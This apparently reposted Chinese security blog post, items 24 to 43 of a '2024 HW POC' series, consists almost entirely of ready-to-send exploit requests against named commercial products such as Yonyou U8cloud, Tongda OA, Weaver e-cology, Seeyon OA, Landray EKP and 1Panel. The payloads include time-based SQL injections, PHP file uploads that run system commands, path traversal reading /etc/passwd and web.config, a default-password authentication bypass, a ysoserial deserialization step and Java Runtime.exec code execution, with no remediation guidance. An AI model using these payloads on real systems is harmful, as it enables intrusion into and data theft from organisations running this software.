2024 HW POC (Part 3)

admin, 26 July 2024, 12:46:13


Original-work statement

This article is an original work of [攻防实战指南]; all rights reserved. Without written authorization from this official account, reproduction, excerpting, copying or mirroring in any form is prohibited. To repost, please contact us. Anyone who violates the above statement will be held legally liable.

24. Yonyou (用友) U8cloud MeasQueryConditionFrameAction interface SQL injection vulnerability

    GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasQueryConditionFrameAction&method=doCopy&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
    Host:
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

25. Jinher OA (金和OA) C6 GeneralXmlhttpPage.aspx SQL injection vulnerability

    GET /C6/Jhsoft.Web.appraise/AppraiseScoreUpdate.aspx/GeneralXmlhttpPage.aspx/?id=%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A4 HTTP/1.1
    Host:

26. Tongda OA (通达OA) V11.10 login.php SQL injection vulnerability

    POST /ispirit/interface/login.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.855.2 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Host:
    Content-Length: 107

    name=123&pass=123&_SERVER[REMOTE_ADDR]=1','10',(select+@`,'`+or+if(1%3d0,1,(select+~0%2b1))+limit+0,1))--+'

27. Kexun (科讯) campus one-card management system get_kq_tj_today SQL injection vulnerability

    GET /api/get_kq_tj_today?KaID=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
    Host:
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close

28. Kexun (科讯) campus one-card management system dormitoryHealthRanking SQL injection vulnerability

    GET /api/dormitoryHealthRanking?building=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1
    Host:
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9

29. 课网络科技有限公司 云课网校系统 (cloud online-school system) uploadImage interface arbitrary file upload vulnerability

    POST /api/uploader/uploadImage HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate, br
    Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
    Cache-Control: no-cache
    Connection: keep-alive
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykvjj6DIn0LIXxe9m
    x-requested-with: XMLHttpRequest
    Host:
    Content-Length: 203

    ------WebKitFormBoundaryLZbmKeasWgo2gPtU
    Content-Disposition: form-data; name="file"; filename="1G3311040N.php"
    Content-Type: image/gif

    <?php phpinfo();?>
    ------WebKitFormBoundaryLZbmKeasWgo2gPtU--

30. WVP video platform push/list unauthenticated SQL injection vulnerability

    GET /api/push/list?page=1&count=15&query=1'&pushing=&mediaServerId= HTTP/1.1
    Host:

31. Seeyon OA (致远OA) ucpcLogin interface authentication bypass vulnerability

    POST /seeyon/rest/authentication/ucpcLogin HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host:

    UserAgentFrom=iphone&login_username=audit-admin&login_password=seeyon123456

32. Bazarr swaggerui component directory traversal leading to arbitrary file read

    GET /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
    Host:

33. Yonyou (用友) NC and U8cloud LoggingConfigServlet interface deserialization vulnerability

Generate the serialized data with ysoserial:

    java -jar ysoserial.jar CommonsCollections6 "calc.exe" > obj.bin

    POST /servlet/~ic/nc.bs.logging.config.LoggingConfigServlet HTTP/1.1
    Host:

    payload

34. Weaver (泛微) e-cology9 /services/WorkPlanService unauthenticated SQL injection vulnerability

    POST /services/WorkPlanService HTTP/1.1
    HOST:
    Content-Length: 430
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: zh-CN,zh;q=0.9
    SOAPAction:
    Content-Type: text/xml;charset=UTF-8
    Host: 192.168.52.168
    Referer: http://192.168.52.168:80/services/WorkPlanService
    Cookie: ecology_JSessionid=aaawzto5mqug94J9Fz0cz
    Connection: close

    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn">
      <soapenv:Header/>
      <soapenv:Body>
        <web:deleteWorkPlan>
          <!--type: string-->
          <web:in0>(SELECT 8544 FROM(SELECT(SLEEP(3-(IF(27=27,0,5)))))NZeo)</web:in0>
          <!--type: int-->
          <web:in1>22</web:in1>
        </web:deleteWorkPlan>
      </soapenv:Body>
    </soapenv:Envelope>

35. 1Panel remote code execution vulnerability

    GET /.git/config HTTP/1.1
    User-Agent: test',"test", "test", "", "YmxvZy5tbzYwLmNu", "test", 0, "deny", 0, 1);ATTACH DATABASE '/www/sites/test/index/test.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?php phpinfo();');#
    Connection: close
    Host:

36. 飞讯云 WMS /MyDown/MyImportData unauthenticated SQL injection vulnerability

    GET /MyDown/MyImportData?opeid=72000301' HTTP/1.1
    Host:
    Pragma: no-cache
    Cache-Control: no-cache
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
    Cookie: JSESSIONID=48887e3b-7976-4804-bb6c-17005cad41b1; Language=zh-CN
    Connection: close

37. 数字通云平台智慧政务 (Shuzitong cloud platform, smart government) time SQL injection vulnerability

    GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=%28SELECT+4655+FROM+%28SELECT%28SLEEP%285%29%29%29usQE%29 HTTP/1.1
    Host:
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTM
    Accept-Encoding: gzip, deflate
    Accept: */*
    Connection: keep-alive

38. 资管云 comfileup.php unauthenticated file upload vulnerability

    POST /comfileup.php HTTP/1.1
    Host:
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: cna=JtMCH7NgWFYCAXBg5XNzopCe
    Upgrade-Insecure-Requests: 1
    Priority: u=1
    Content-Type: multipart/form-data; boundary=--------1110146050
    Content-Length: 117

    ----------1110146050
    Content-Disposition: form-data; name="file";filename="test.php"

    test
    ----------1110146050--

39. Landray (蓝凌) EKP remote code execution vulnerability

1. Move the directory

    GET /ekp/sys/ui/sys_ui_component/sysUiComponent.do?method=replaceExtend&extendId=../../../../resource/help/km/review/&folderName=../../../ekp/sys/common HTTP/1.1
    Host:

2. Use dataxml.jsp to execute arbitrary code

    POST /ekp/resource/help/km/review/dataxml.jsp HTTP/1.1
    Host:
    Content-Type: application/x-www-form-urlencoded

    s_bean=sysFormulaSimulateByJS&script=var x = Function/**/('return(java.lang.Runtime.getRuntime())')();x.exec("calc.exe");var a = mainOutput();function mainOutput() {};

40. 赛蓝 enterprise management system DownloadBuilder arbitrary file read vulnerability

    GET /BaseModule/ReportManage/DownloadBuilder?filename=/../web.config HTTP/1.1
    Host:
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate, br
    Connection: close

41. SuiteCRM responseEntryPoint SQL injection vulnerability

    GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(5);--+-&type=c&response=accept HTTP/1.1
    Host:

42. Yonyou (用友) U8CRM import.php arbitrary file upload vulnerability

    POST /crmtools/tools/import.php?DontCheckLogin=1&issubmit=1 HTTP/1.1
    Host:
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye0z8QbHs79gL8vW5
    Content-Length: 295

    ------WebKitFormBoundarye0z8QbHs79gL8vW5
    Content-Disposition: form-data; name="xfile"; filename="1.xls"

    <?php system("whoami");unlink(__FILE__);?>
    ------WebKitFormBoundarye0z8QbHs79gL8vW5
    Content-Disposition: form-data; name="combo"

    rce.php
    ------WebKitFormBoundarye0z8QbHs79gL8vW5--

43. 宏脉医疗 (Hongmai Medical) DownLoadServerFile arbitrary file read/download vulnerability

    POST /zh-CN/PublicInterface/DownLoadServerFile HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
    Accept-Encoding: gzip, deflate

    filePath=c:\windows\win.ini


Originally published on the WeChat official account 攻防实战指南: 2024 HW POC (Part 3)

Reposted at CN-SEC: https://cn-sec.com/archives/2999796.html